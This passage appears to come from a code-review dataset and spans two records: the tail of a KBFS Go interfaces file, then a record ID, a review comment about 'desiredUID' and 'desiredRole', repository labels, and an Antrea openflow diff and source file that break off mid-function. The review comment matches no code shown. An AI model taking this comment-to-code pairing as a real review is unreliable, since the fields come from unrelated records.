serverHalf kbfscrypto.BlockCryptKeyServerHalf) error // AddBlockReference adds a new reference to the given block, // defined by the given context (which should contain a // non-zero kbfsblock.RefNonce). (Contexts with a // kbfsblock.RefNonce of zero should be used when putting the // block for the first time via Put().) Returns a // BServerErrorBlockNonExistent if id is unknown within this // folder. // // AddBlockReference should be idempotent, although it should // also return an error if, for a given ID and refnonce, any // of the other fields of context differ from previous // AddBlockReference calls with the same ID and refnonce. // // If this returns a BServerErrorOverQuota, with Throttled=false, // the caller can treat it as informational and otherwise ignore // the error. AddBlockReference(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context) error // RemoveBlockReferences removes the references to the given block // ID defined by the given contexts. If no references to the block // remain after this call, the server is allowed to delete the // corresponding block permanently. If the reference defined by // the count has already been removed, the call is a no-op. // It returns the number of remaining not-yet-deleted references after this // reference has been removed RemoveBlockReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap) (liveCounts map[kbfsblock.ID]int, err error) // ArchiveBlockReferences marks the given block references as // "archived"; that is, they are not being used in the current // view of the folder, and shouldn't be served to anyone other // than folder writers. // // For a given ID/refnonce pair, ArchiveBlockReferences should // be idempotent, although it should also return an error if // any of the other fields of the context differ from previous // calls with the same ID/refnonce pair. ArchiveBlockReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap) error // IsUnflushed returns whether a given block is being queued // locally for later flushing to another block server. If the // block is currently being flushed to the server, this should // return `true`, so that the caller will try to clean it up from // the server if it's no longer needed. IsUnflushed(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID) ( bool, error) // Shutdown is called to shutdown a BlockServer connection. Shutdown(ctx context.Context) // GetUserQuotaInfo returns the quota for the logged-in user. GetUserQuotaInfo(ctx context.Context) (info *kbfsblock.QuotaInfo, err error) // GetTeamQuotaInfo returns the quota for a team. GetTeamQuotaInfo(ctx context.Context, tid keybase1.TeamID) ( info *kbfsblock.QuotaInfo, err error) } // blockServerLocal is the interface for BlockServer implementations // that store data locally. type blockServerLocal interface { BlockServer // getAllRefsForTest returns all the known block references // for the given TLF, and should only be used during testing. getAllRefsForTest(ctx context.Context, tlfID tlf.ID) ( map[kbfsblock.ID]blockRefMap, error) } // BlockSplitter decides when a file or directory block needs to be split type BlockSplitter interface { // CopyUntilSplit copies data into the block until we reach the // point where we should split, but only if writing to the end of // the last block. If this is writing into the middle of a file, // just copy everything that will fit into the block, and assume // that block boundaries will be fixed later. Return how much was // copied. CopyUntilSplit( block *FileBlock, lastBlock bool, data []byte, off int64) int64 // CheckSplit, given a block, figures out whether it ends at the // right place. If so, return 0. If not, return either the // offset in the block where it should be split, or -1 if more // bytes from the next block should be appended. CheckSplit(block *FileBlock) int64 // MaxPtrsPerBlock describes the number of indirect pointers we // can fit into one indirect block. MaxPtrsPerBlock() int // ShouldEmbedBlockChanges decides whether we should keep the // block changes embedded in the MD or not. ShouldEmbedBlockChanges(bc *BlockChanges) bool } // KeyServer fetches/writes server-side key halves from/to the key server. type KeyServer interface { // GetTLFCryptKeyServerHalf gets a server-side key half for a // device given the key half ID. GetTLFCryptKeyServerHalf(ctx context.Context, serverHalfID TLFCryptKeyServerHalfID, cryptPublicKey kbfscrypto.CryptPublicKey) ( kbfscrypto.TLFCryptKeyServerHalf, error) // PutTLFCryptKeyServerHalves stores a server-side key halves for a // set of users and devices. PutTLFCryptKeyServerHalves(ctx context.Context, keyServerHalves UserDeviceKeyServerHalves) error // DeleteTLFCryptKeyServerHalf deletes a server-side key half for a // device given the key half ID. DeleteTLFCryptKeyServerHalf(ctx context.Context, uid keybase1.UID, key kbfscrypto.CryptPublicKey, serverHalfID TLFCryptKeyServerHalfID) error // Shutdown is called to free any KeyServer resources. Shutdown() } // NodeChange represents a change made to a node as part of an atomic // file system operation. type NodeChange struct { Node Node // Basenames of entries added/removed. DirUpdated []string FileUpdated []WriteRange } // Observer can be notified that there is an available update for a // given directory. The notification callbacks should not block, or // make any calls to the Notifier interface. Nodes passed to the // observer should not be held past the end of the notification // callback. type Observer interface { // LocalChange announces that the file at this Node has been // updated locally, but not yet saved at the server. LocalChange(ctx context.Context, node Node, write WriteRange) // BatchChanges announces that the nodes have all been updated // together atomically. Each NodeChange in changes affects the // same top-level folder and branch. BatchChanges(ctx context.Context, changes []NodeChange) // TlfHandleChange announces that the handle of the corresponding // folder branch has changed, likely due to previously-unresolved // assertions becoming resolved. This indicates that the listener // should switch over any cached paths for this folder-branch to // the new name. Nodes that were acquired under the old name will // still continue to work, but new lookups on the old name may // either encounter alias errors or entirely new TLFs (in the case // of conflicts). TlfHandleChange(ctx context.Context, newHandle *TlfHandle) } // Notifier notifies registrants of directory changes type Notifier interface { // RegisterForChanges declares that the given Observer wants to // subscribe to updates for the given top-level folders. RegisterForChanges(folderBranches []FolderBranch, obs Observer) error // UnregisterFromChanges declares that the given Observer no // longer wants to subscribe to updates for the given top-level // folders. UnregisterFromChanges(folderBranches []FolderBranch, obs Observer) error } // Clock is an interface for getting the current time type Clock interface { // Now returns the current time. Now() time.Time } // ConflictRenamer deals with names for conflicting directory entries. type ConflictRenamer interface { // ConflictRename returns the appropriately modified filename. ConflictRename(ctx context.Context, op op, original string) ( string, error) } // Tracer maybe adds traces to contexts. type Tracer interface { // MaybeStartTrace, if tracing is on, returns a new context // based on the given one with an attached trace made with the // given family and title. Otherwise, it returns the given // context unchanged. MaybeStartTrace(ctx context.Context, family, title string) context.Context // MaybeFinishTrace, finishes the trace attached to the given // context, if any. MaybeFinishTrace(ctx context.Context, err error) } // Config collects all the singleton instance instantiations needed to // run KBFS in one place. The methods below are self-explanatory and // do not require comments. type Config interface { dataVersioner logMaker blockCacher blockServerGetter codecGetter cryptoPureGetter keyGetterGetter cryptoGetter signerGetter currentSessionGetterGetter diskBlockCacheGetter diskBlockCacheSetter clockGetter diskLimiterGetter Tracer KBFSOps() KBFSOps SetKBFSOps(KBFSOps) KBPKI() KBPKI SetKBPKI(KBPKI) KeyManager() KeyManager SetKeyManager(KeyManager) Reporter() Reporter SetReporter(Reporter) MDCache() MDCache SetMDCache(MDCache) KeyCache() KeyCache SetKeyBundleCache(KeyBundleCache) KeyBundleCache() KeyBundleCache SetKeyCache(KeyCache) SetBlockCache(BlockCache) DirtyBlockCache() DirtyBlockCache SetDirtyBlockCache(DirtyBlockCache) SetCrypto(Crypto) SetCodec(kbfscodec.Codec) MDOps() MDOps SetMDOps(MDOps) KeyOps() KeyOps SetKeyOps(KeyOps) BlockOps() BlockOps SetBlockOps(BlockOps) MDServer() MDServer SetMDServer(MDServer) SetBlockServer(BlockServer) KeyServer() KeyServer SetKeyServer(KeyServer) KeybaseService() KeybaseService SetKeybaseService(KeybaseService) BlockSplitter() BlockSplitter SetBlockSplitter(BlockSplitter) Notifier() Notifier SetNotifier(Notifier) SetClock(Clock) ConflictRenamer() ConflictRenamer SetConflictRenamer(ConflictRenamer) MetadataVersion() MetadataVer SetMetadataVersion(MetadataVer) RekeyQueue() RekeyQueue SetRekeyQueue(RekeyQueue) // ReqsBufSize indicates the number of read or write operations // that can be buffered per folder ReqsBufSize() int // MaxNameBytes indicates the maximum supported size of a // directory entry name in bytes. MaxNameBytes() uint32 // MaxDirBytes indicates the maximum supported plaintext size of a // directory in bytes. MaxDirBytes() uint64 // DoBackgroundFlushes says whether we should periodically try to // flush dirty files, even without a sync from the user. Should // be true except for during some testing. DoBackgroundFlushes() bool SetDoBackgroundFlushes(bool) // RekeyWithPromptWaitTime indicates how long to wait, after // setting the rekey bit, before prompting for a paper key. RekeyWithPromptWaitTime() time.Duration SetRekeyWithPromptWaitTime(time.Duration) // Mode indicates how KBFS is configured to run. Mode() InitMode // GracePeriod specifies a grace period for which a delayed cancellation // waits before actual cancels the context. This is useful for giving // critical portion of a slow remote operation some extra time to finish as // an effort to avoid conflicting. Example include an O_EXCL Create call // interrupted by ALRM signal actually makes it to the server, while // application assumes not since EINTR is returned. A delayed cancellation // allows us to distinguish between successful cancel (where remote operation // didn't make to server) or failed cancel (where remote operation made to // the server). However, the optimal value of this depends on the network // conditions. A long grace period for really good network condition would // just unnecessarily slow down Ctrl-C. // // TODO: make this adaptive and self-change over time based on network // conditions. DelayedCancellationGracePeriod() time.Duration SetDelayedCancellationGracePeriod(time.Duration) // QuotaReclamationPeriod indicates how often should each TLF // should check for quota to reclaim. If the Duration.Seconds() // == 0, quota reclamation should not run automatically. QuotaReclamationPeriod() time.Duration // QuotaReclamationMinUnrefAge indicates the minimum time a block // must have been unreferenced before it can be reclaimed. QuotaReclamationMinUnrefAge() time.Duration // QuotaReclamationMinHeadAge indicates the minimum age of the // most recently merged MD update before we can run reclamation, // to avoid conflicting with a currently active writer. QuotaReclamationMinHeadAge() time.Duration // ResetCaches clears and re-initializes all data and key caches. ResetCaches() // StorageRoot returns the path to the storage root for this config. StorageRoot() string // MetricsRegistry may be nil, which should be interpreted as // not using metrics at all. (i.e., as if UseNilMetrics were // set). This differs from how go-metrics treats nil Registry // objects, which is to use the default registry. MetricsRegistry() metrics.Registry SetMetricsRegistry(metrics.Registry) // SetTraceOptions set the options for tracing (via x/net/trace). SetTraceOptions(enabled bool) // TLFValidDuration is the time TLFs are valid before identification needs to be redone. TLFValidDuration() time.Duration // SetTLFValidDuration sets TLFValidDuration. SetTLFValidDuration(time.Duration) // BGFlushDirOpBatchSize returns the directory op batch size for // background flushes. BGFlushDirOpBatchSize() int // SetBGFlushDirOpBatchSize sets the directory op batch size for // background flushes. SetBGFlushDirOpBatchSize(s int) // BGFlushPeriod returns how long to wait for a batch to fill up // before syncing a set of changes to the servers. BGFlushPeriod() time.Duration // SetBGFlushPeriod sets how long to wait for a batch to fill up // before syncing a set of changes to the servers. SetBGFlushPeriod(p time.Duration) // Shutdown is called to free config resources. Shutdown(context.Context) error // CheckStateOnShutdown tells the caller whether or not it is safe // to check the state of the system on shutdown. CheckStateOnShutdown() bool } // NodeCache holds Nodes, and allows libkbfs to update them when // things change about the underlying KBFS blocks. It is probably // most useful to instantiate this on a per-folder-branch basis, so // that it can create a Path with the correct DirId and Branch name. type NodeCache interface { // GetOrCreate either makes a new Node for the given // BlockPointer, or returns an existing one. TODO: If we ever // support hard links, we will have to revisit the "name" and // "parent" parameters here. name must not be empty. Returns // an error if parent cannot be found. GetOrCreate(ptr BlockPointer, name string, parent Node) (Node, error) // Get returns the Node associated with the given ptr if one // already exists. Otherwise, it returns nil. Get(ref BlockRef) Node // UpdatePointer updates the BlockPointer for the corresponding // Node. NodeCache ignores this call when oldRef is not cached in // any Node. Returns whether the pointer was updated. UpdatePointer(oldRef BlockRef, newPtr BlockPointer) bool // Move swaps the parent node for the corresponding Node, and // updates the node's name. NodeCache ignores the call when ptr // is not cached. If newParent is nil, it treats the ptr's // corresponding node as being unlinked from the old parent // completely. If successful, it returns a function that can be // called to undo the effect of the move (or `nil` if nothing // needs to be done); if newParent cannot be found, it returns an // error and a `nil` undo function. Move(ref BlockRef, newParent Node, newName string) ( undoFn func(), err error) // Unlink set the corresponding node's parent to nil and caches // the provided path in case the node is still open. NodeCache // ignores the call when ptr is not cached. The path is required // because the caller may have made changes to the parent nodes // already that shouldn't be reflected in the cached path. It // returns a function that can be called to undo the effect of the // unlink (or `nil` if nothing needs to be done). Unlink(ref BlockRef, oldPath path, oldDe DirEntry) (undoFn func()) // IsUnlinked returns whether `Unlink` has been called for the // reference behind this node. IsUnlinked(node Node) bool // UnlinkedDirEntry returns a pointer to a modifiable directory // entry if `Unlink` has been called for the reference behind this // node. UnlinkedDirEntry(node Node) DirEntry // PathFromNode creates the path up to a given Node. PathFromNode(node Node) path // AllNodes returns the complete set of nodes currently in the cache. AllNodes() []Node } // fileBlockDeepCopier fetches a file block, makes a deep copy of it // (duplicating pointer for any indirect blocks) and generates a new // random temporary block ID for it. It returns the new BlockPointer, // and internally saves the block for future uses. type fileBlockDeepCopier func(context.Context, string, BlockPointer) ( BlockPointer, error) // crAction represents a specific action to take as part of the // conflict resolution process. type crAction interface { // swapUnmergedBlock should be called before do(), and if it // returns true, the caller must use the merged block // corresponding to the returned BlockPointer instead of // unmergedBlock when calling do(). If BlockPointer{} is zeroPtr // (and true is returned), just swap in the regular mergedBlock. swapUnmergedBlock(unmergedChains *crChains, mergedChains *crChains, unmergedBlock *DirBlock) (bool, BlockPointer, error) // do modifies the given merged block in place to resolve the // conflict, and potential uses the provided blockCopyFetchers to // obtain copies of other blocks (along with new BlockPointers) // when requiring a block copy. do(ctx context.Context, unmergedCopier fileBlockDeepCopier, mergedCopier fileBlockDeepCopier, unmergedBlock *DirBlock, mergedBlock *DirBlock) error // updateOps potentially modifies, in place, the slices of // unmerged and merged operations stored in the corresponding // crChains for the given unmerged and merged most recent // pointers. Eventually, the "unmerged" ops will be pushed as // part of a MD update, and so should contain any necessarily // operations to fully merge the unmerged data, including any // conflict resolution. The "merged" ops will be played through // locally, to notify any caches about the newly-obtained merged // data (and any changes to local data that were required as part // of conflict resolution, such as renames). A few things to note: // * A particular action's updateOps method may be called more than // once for different sets of chains, however it should only add // new directory operations (like create/rm/rename) into directory // chains. // * updateOps doesn't necessarily result in correct BlockPointers within // each of those ops; that must happen in a later phase. // * mergedBlock can be nil if the chain is for a file. updateOps(unmergedMostRecent BlockPointer, mergedMostRecent BlockPointer, unmergedBlock *DirBlock, mergedBlock *DirBlock, unmergedChains *crChains, mergedChains *crChains) error // String returns a string representation for this crAction, used // for debugging. String() string } // RekeyQueue is a managed queue of folders needing some rekey action taken // upon them by the current client. type RekeyQueue interface { // Enqueue enqueues a folder for rekey action. If the TLF is already in the // rekey queue, the error channel of the existing one is returned. Enqueue(tlf.ID) // IsRekeyPending returns true if the given folder is in the rekey queue. // Note that an ongoing rekey doesn't count as "pending". IsRekeyPending(tlf.ID) bool // Shutdown cancels all pending rekey actions and clears the queue. It // doesn't cancel ongoing rekeys. After Shutdown() is called, the same // RekeyQueue shouldn't be used anymore. Shutdown() } // BareRootMetadata is a read-only interface to the bare serializeable MD that // is signed by the reader or writer. type BareRootMetadata interface { // TlfID returns the ID of the TLF this BareRootMetadata is for. TlfID() tlf.ID // KeyGenerationsToUpdate returns a range that has to be // updated when rekeying. start is included, but end is not // included. This range can be empty (i.e., start >= end), in // which case there's nothing to update, i.e. the TLF is // public, or there aren't any existing key generations. KeyGenerationsToUpdate() (start KeyGen, end KeyGen) // LatestKeyGeneration returns the most recent key generation in this // BareRootMetadata, or PublicKeyGen if this TLF is public. LatestKeyGeneration() KeyGen // IsValidRekeyRequest returns true if the current block is a simple rekey wrt // the passed block. IsValidRekeyRequest(codec kbfscodec.Codec, prevMd BareRootMetadata, user keybase1.UID, prevExtra, extra ExtraMetadata) (bool, error) // MergedStatus returns the status of this update -- has it been // merged into the main folder or not? MergedStatus() MergeStatus // IsRekeySet returns true if the rekey bit is set. IsRekeySet() bool // IsWriterMetadataCopiedSet returns true if the bit is set indicating // the writer metadata was copied. IsWriterMetadataCopiedSet() bool // IsFinal returns true if this is the last metadata block for a given // folder. This is only expected to be set for folder resets. IsFinal() bool // IsWriter returns whether or not the user+device is an authorized writer. IsWriter(ctx context.Context, user keybase1.UID, deviceKey kbfscrypto.CryptPublicKey, teamMemChecker TeamMembershipChecker, extra ExtraMetadata) (bool, error) // IsReader returns whether or not the user+device is an authorized reader. IsReader(ctx context.Context, user keybase1.UID, deviceKey kbfscrypto.CryptPublicKey, teamMemChecker TeamMembershipChecker, extra ExtraMetadata) (bool, error) // DeepCopy returns a deep copy of the underlying data structure. DeepCopy(codec kbfscodec.Codec) (MutableBareRootMetadata, error) // MakeSuccessorCopy returns a newly constructed successor // copy to this metadata revision. It differs from DeepCopy // in that it can perform an up conversion to a new metadata // version. tlfCryptKeyGetter should be a function that // returns a list of TLFCryptKeys for all key generations in // ascending order. MakeSuccessorCopy(codec kbfscodec.Codec, crypto cryptoPure, extra ExtraMetadata, latestMDVer MetadataVer, tlfCryptKeyGetter func() ([]kbfscrypto.TLFCryptKey, error), isReadableAndWriter bool) (mdCopy MutableBareRootMetadata, extraCopy ExtraMetadata, err error) // CheckValidSuccessor makes sure the given BareRootMetadata is a valid // successor to the current one, and returns an error otherwise. CheckValidSuccessor(currID kbfsmd.ID, nextMd BareRootMetadata) error // CheckValidSuccessorForServer is like CheckValidSuccessor but with // server-specific error messages. CheckValidSuccessorForServer(currID kbfsmd.ID, nextMd BareRootMetadata) error // MakeBareTlfHandle makes a tlf.Handle for this // BareRootMetadata. Should be used only by servers and MDOps. MakeBareTlfHandle(extra ExtraMetadata) (tlf.Handle, error) // TlfHandleExtensions returns a list of handle extensions associated with the TLf. TlfHandleExtensions() (extensions []tlf.HandleExtension) // GetDevicePublicKeys returns the kbfscrypto.CryptPublicKeys // for all known users and devices. Returns an error if the // TLF is public. GetUserDevicePublicKeys(extra ExtraMetadata) ( writers, readers UserDevicePublicKeys, err error) // GetTLFCryptKeyParams returns all the necessary info to construct // the TLF crypt key for the given key generation, user, and device // (identified by its crypt public key), or false if not found. This // returns an error if the TLF is public. GetTLFCryptKeyParams(keyGen KeyGen, user keybase1.UID, key kbfscrypto.CryptPublicKey, extra ExtraMetadata) ( kbfscrypto.TLFEphemeralPublicKey, EncryptedTLFCryptKeyClientHalf, TLFCryptKeyServerHalfID, bool, error) // IsValidAndSigned verifies the BareRootMetadata, checks the // writer signature, and returns an error if a problem was // found. This should be the first thing checked on a BRMD // retrieved from an untrusted source, and then the signing // user and key should be validated, either by comparing to // the current device key (using IsLastModifiedBy), or by // checking with KBPKI. IsValidAndSigned(ctx context.Context, codec kbfscodec.Codec, crypto cryptoPure, teamMemChecker TeamMembershipChecker, extra ExtraMetadata) error // IsLastModifiedBy verifies that the BareRootMetadata is // written by the given user and device (identified by the // device verifying key), and returns an error if not. IsLastModifiedBy(uid keybase1.UID, key kbfscrypto.VerifyingKey) error // LastModifyingWriter return the UID of the last user to modify the writer metadata. LastModifyingWriter() keybase1.UID // LastModifyingUser return the UID of the last user to modify the any of the metadata. GetLastModifyingUser() keybase1.UID // RefBytes returns the number of newly referenced bytes of data blocks introduced by this revision of metadata. RefBytes() uint64 // UnrefBytes returns the number of newly unreferenced bytes introduced by this revision of metadata. UnrefBytes() uint64 // MDRefBytes returns the number of newly referenced bytes of MD blocks introduced by this revision of metadata. MDRefBytes() uint64 // DiskUsage returns the estimated disk usage for the folder as of this revision of metadata. DiskUsage() uint64 // MDDiskUsage returns the estimated MD disk usage for the folder as of this revision of metadata. MDDiskUsage() uint64 // RevisionNumber returns the revision number associated with this metadata structure. RevisionNumber() kbfsmd.Revision // MerkleSeqNo returns the sequence number of the global // Keybase Merkle tree at the time the MD was written. MerkleSeqNo() MerkleSeqNo // BID returns the per-device branch ID associated with this metadata revision. BID() BranchID // GetPrevRoot returns the hash of the previous metadata revision. GetPrevRoot() kbfsmd.ID // IsUnmergedSet returns true if the unmerged bit is set. IsUnmergedSet() bool // GetSerializedPrivateMetadata returns the serialized private metadata as a byte slice. GetSerializedPrivateMetadata() []byte // GetSerializedWriterMetadata serializes the underlying writer metadata and returns the result. GetSerializedWriterMetadata(codec kbfscodec.Codec) ([]byte, error) // Version returns the metadata version. Version() MetadataVer // GetCurrentTLFPublicKey returns the TLF public key for the // current key generation. GetCurrentTLFPublicKey(ExtraMetadata) (kbfscrypto.TLFPublicKey, error) // GetUnresolvedParticipants returns any unresolved readers // and writers present in this revision of metadata. The // returned array should be safe to modify by the caller. GetUnresolvedParticipants() []keybase1.SocialAssertion // GetTLFWriterKeyBundleID returns the ID of the externally-stored writer key bundle, or the zero value if // this object stores it internally. GetTLFWriterKeyBundleID() TLFWriterKeyBundleID // GetTLFReaderKeyBundleID returns the ID of the externally-stored reader key bundle, or the zero value if // this object stores it internally. GetTLFReaderKeyBundleID() TLFReaderKeyBundleID // StoresHistoricTLFCryptKeys returns whether or not history keys are symmetrically encrypted; if not, they're // encrypted per-device. StoresHistoricTLFCryptKeys() bool // GetHistoricTLFCryptKey attempts to symmetrically decrypt the key at the given // generation using the current generation's TLFCryptKey. GetHistoricTLFCryptKey(c cryptoPure, keyGen KeyGen, currentKey kbfscrypto.TLFCryptKey, extra ExtraMetadata) ( kbfscrypto.TLFCryptKey, error) } // MutableBareRootMetadata is a mutable interface to the bare serializeable MD that is signed by the reader or writer. type MutableBareRootMetadata interface { BareRootMetadata // SetRefBytes sets the number of newly referenced bytes of data blocks introduced by this revision of metadata. SetRefBytes(refBytes uint64) // SetUnrefBytes sets the number of newly unreferenced bytes introduced by this revision of metadata. SetUnrefBytes(unrefBytes uint64) // SetMDRefBytes sets the number of newly referenced bytes of MD blocks introduced by this revision of metadata. SetMDRefBytes(mdRefBytes uint64) // SetDiskUsage sets the estimated disk usage for the folder as of this revision of metadata. SetDiskUsage(diskUsage uint64) // SetMDDiskUsage sets the estimated MD disk usage for the folder as of this revision of metadata. SetMDDiskUsage(mdDiskUsage uint64) // AddRefBytes increments the number of newly referenced bytes of data blocks introduced by this revision of metadata. AddRefBytes(refBytes uint64) // AddUnrefBytes increments the number of newly unreferenced bytes introduced by this revision of metadata. AddUnrefBytes(unrefBytes uint64) // AddMDRefBytes increments the number of newly referenced bytes of MD blocks introduced by this revision of metadata. AddMDRefBytes(mdRefBytes uint64) // AddDiskUsage increments the estimated disk usage for the folder as of this revision of metadata. AddDiskUsage(diskUsage uint64) // AddMDDiskUsage increments the estimated MD disk usage for the folder as of this revision of metadata. AddMDDiskUsage(mdDiskUsage uint64) // ClearRekeyBit unsets any set rekey bit. ClearRekeyBit() // ClearWriterMetadataCopiedBit unsets any set writer metadata copied bit. ClearWriterMetadataCopiedBit() // ClearFinalBit unsets any final bit. ClearFinalBit() // SetUnmerged sets the unmerged bit. SetUnmerged() // SetBranchID sets the branch ID for this metadata revision. SetBranchID(bid BranchID) // SetPrevRoot sets the hash of the previous metadata revision. SetPrevRoot(mdID kbfsmd.ID) // SetSerializedPrivateMetadata sets the serialized private metadata. SetSerializedPrivateMetadata(spmd []byte) // SignWriterMetadataInternally signs the writer metadata, for // versions that store this signature inside the metadata. SignWriterMetadataInternally(ctx context.Context, codec kbfscodec.Codec, signer kbfscrypto.Signer) error // SetLastModifyingWriter sets the UID of the last user to modify the writer metadata. SetLastModifyingWriter(user keybase1.UID) // SetLastModifyingUser sets the UID of the last user to modify any of the metadata. SetLastModifyingUser(user keybase1.UID) // SetRekeyBit sets the rekey bit. SetRekeyBit() // SetFinalBit sets the finalized bit. SetFinalBit() // SetWriterMetadataCopiedBit set the writer metadata copied bit. SetWriterMetadataCopiedBit() // SetRevision sets the revision number of the underlying metadata. SetRevision(revision kbfsmd.Revision) // SetMerkleSeqNo sets the sequence number of the global // Keybase Merkle tree at the time the MD was written. SetMerkleSeqNo(seqNo MerkleSeqNo) // SetUnresolvedReaders sets the list of unresolved readers associated with this folder. SetUnresolvedReaders(readers []keybase1.SocialAssertion) // SetUnresolvedWriters sets the list of unresolved writers associated with this folder. SetUnresolvedWriters(writers []keybase1.SocialAssertion) // SetConflictInfo sets any conflict info associated with this metadata revision. SetConflictInfo(ci *tlf.HandleExtension) // SetFinalizedInfo sets any finalized info associated with this metadata revision. SetFinalizedInfo(fi *tlf.HandleExtension) // SetWriters sets the list of writers associated with this folder. SetWriters(writers []keybase1.UserOrTeamID) // SetTlfID sets the ID of the underlying folder in the metadata structure. SetTlfID(tlf tlf.ID) // AddKeyGeneration adds a new key generation to this revision // of metadata. If StoresHistoricTLFCryptKeys is false, then // currCryptKey must be zero. Otherwise, currCryptKey must be // zero if there are no existing key generations, and non-zero // for otherwise. // // AddKeyGeneration must only be called on metadata for // private TLFs. // // Note that the TLFPrivateKey corresponding to privKey must // also be stored in PrivateMetadata. AddKeyGeneration(codec kbfscodec.Codec, crypto cryptoPure, currExtra ExtraMetadata, updatedWriterKeys, updatedReaderKeys UserDevicePublicKeys, ePubKey kbfscrypto.TLFEphemeralPublicKey, ePrivKey kbfscrypto.TLFEphemeralPrivateKey, pubKey kbfscrypto.TLFPublicKey, currCryptKey, nextCryptKey kbfscrypto.TLFCryptKey) ( nextExtra ExtraMetadata, serverHalves UserDeviceKeyServerHalves, err error) // SetLatestKeyGenerationForTeamTLF sets the latest key generation // number of a team TLF. It is not valid to call this for // anything but a team TLF. SetLatestKeyGenerationForTeamTLF(keyGen KeyGen) // UpdateKeyBundles ensures that every device for every writer // and reader in the provided lists has complete TLF crypt key // info, and uses the new ephemeral key pair to generate the // info if it doesn't yet exist. tlfCryptKeys must contain an // entry for each key generation in KeyGenerationsToUpdate(), // in ascending order. // // updatedWriterKeys and updatedReaderKeys usually contains // the full maps of writers to per-device crypt public keys, // but for reader rekey, updatedWriterKeys will be empty and // updatedReaderKeys will contain only a single entry. // // UpdateKeyBundles must only be called on metadata for // private TLFs. // // An array of server halves to push to the server are // returned, with each entry corresponding to each key // generation in KeyGenerationsToUpdate(), in ascending order. UpdateKeyBundles(crypto cryptoPure, extra ExtraMetadata, updatedWriterKeys, updatedReaderKeys UserDevicePublicKeys, ePubKey kbfscrypto.TLFEphemeralPublicKey, ePrivKey kbfscrypto.TLFEphemeralPrivateKey, tlfCryptKeys []kbfscrypto.TLFCryptKey) ( []UserDeviceKeyServerHalves, error) // PromoteReaders converts the given set of users (which may // be empty) from readers to writers. PromoteReaders(readersToPromote map[keybase1.UID]bool, extra ExtraMetadata) error // RevokeRemovedDevices removes key info for any device not in // the given maps, and returns a corresponding map of server // halves to delete from the server. // // Note: the returned server halves may not be for all key // generations, e.g. for MDv3 it's only for the latest key // generation. RevokeRemovedDevices( updatedWriterKeys, updatedReaderKeys UserDevicePublicKeys, extra ExtraMetadata) (ServerHalfRemovalInfo, error) // FinalizeRekey must be called called after all rekeying work // has been performed on the underlying metadata. FinalizeRekey(c cryptoPure, extra ExtraMetadata) error } // KeyBundleCache is an interface to a key bundle cache for use with v3 metadata. type KeyBundleCache interface { // GetTLFReaderKeyBundle returns the TLFReaderKeyBundleV3 for // the given TLFReaderKeyBundleID, or nil if there is none. GetTLFReaderKeyBundle(tlf.ID, TLFReaderKeyBundleID) (*TLFReaderKeyBundleV3, error) // GetTLFWriterKeyBundle returns the TLFWriterKeyBundleV3 for // the given TLFWriterKeyBundleID, or nil if there is none. GetTLFWriterKeyBundle(tlf.ID, TLFWriterKeyBundleID) (*TLFWriterKeyBundleV3, error) // PutTLFReaderKeyBundle stores the given TLFReaderKeyBundleV3. PutTLFReaderKeyBundle(tlf.ID, TLFReaderKeyBundleID, TLFReaderKeyBundleV3) // PutTLFWriterKeyBundle stores the given TLFWriterKeyBundleV3. PutTLFWriterKeyBundle(tlf.ID, TLFWriterKeyBundleID, TLFWriterKeyBundleV3) } // RekeyFSM is a Finite State Machine (FSM) for housekeeping rekey states for a // FolderBranch. Each FolderBranch has its own FSM for rekeys. // // See rekey_fsm.go for implementation details. // // TODO: report FSM status in FolderBranchStatus? type RekeyFSM interface { // Event sends an event to the FSM. Event(event RekeyEvent) // Shutdown shuts down the FSM. No new event should be sent into the FSM // after this method is called. Shutdown() // listenOnEvent adds a listener (callback) to the FSM so that when // event happens, callback is called with the received event. If repeatedly // is set to false, callback is called only once. Otherwise it's called every // time event happens. // // Currently this is only used in tests and for RekeyFile. See comment for // RequestRekeyAndWaitForOneFinishEvent for more details. listenOnEvent( event rekeyEventType, callback func(RekeyEvent), repeatedly bool) } // BlockRetriever specifies how to retrieve blocks. type BlockRetriever interface { // Request retrieves blocks asynchronously. Request(ctx context.Context, priority int, kmd KeyMetadata, ptr BlockPointer, block Block, lifetime BlockCacheLifetime) <-chan error // CacheAndPrefetch caches a block along with its prefetch status, and then // triggers prefetches as appropriate. CacheAndPrefetch(ctx context.Context, ptr BlockPointer, block Block, kmd KeyMetadata, priority int, lifetime BlockCacheLifetime, hasPrefetched bool) error }
1
17,205
I believe you meant "specify `desiredUID` and `desiredRole`"?
keybase-kbfs
go
@@ -16,10 +16,9 @@ package openflow import ( "fmt" + "github.com/vmware-tanzu/antrea/pkg/apis/networking/v1beta1" "net" - coreV1 "k8s.io/api/core/v1" - v1 "k8s.io/api/networking/v1" "k8s.io/klog" "github.com/vmware-tanzu/antrea/pkg/agent/types"
1
// Copyright 2019 Antrea Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package openflow import ( "fmt" "net" coreV1 "k8s.io/api/core/v1" v1 "k8s.io/api/networking/v1" "k8s.io/klog" "github.com/vmware-tanzu/antrea/pkg/agent/types" binding "github.com/vmware-tanzu/antrea/pkg/ovs/openflow" ) const ( MatchDstIP int = iota MatchSrcIP MatchDstIPNet MatchSrcIPNet MatchDstOFPort MatchSrcOFPort MatchTCPDstPort MatchUDPDstPort MatchSCTPDstPort Unsupported ) // IP address calculated from Pod's address. type IPAddress net.IP func (a *IPAddress) GetMatchKey(addrType types.AddressType) int { switch addrType { case types.SrcAddress: return MatchSrcIP case types.DstAddress: return MatchDstIP default: klog.Errorf("Unknown AddressType %d in IPAddress", addrType) return Unsupported } } func (a *IPAddress) GetMatchValue() string { addr := net.IP(*a) return addr.String() } func (a *IPAddress) GetValue() interface{} { return net.IP(*a) } func NewIPAddress(addr net.IP) *IPAddress { ia := IPAddress(addr) return &ia } // IP block calculated from Pod's address. type IPNetAddress net.IPNet func (a *IPNetAddress) GetMatchKey(addrType types.AddressType) int { switch addrType { case types.SrcAddress: return MatchSrcIPNet case types.DstAddress: return MatchDstIPNet default: klog.Errorf("Unknown AddressType %d in 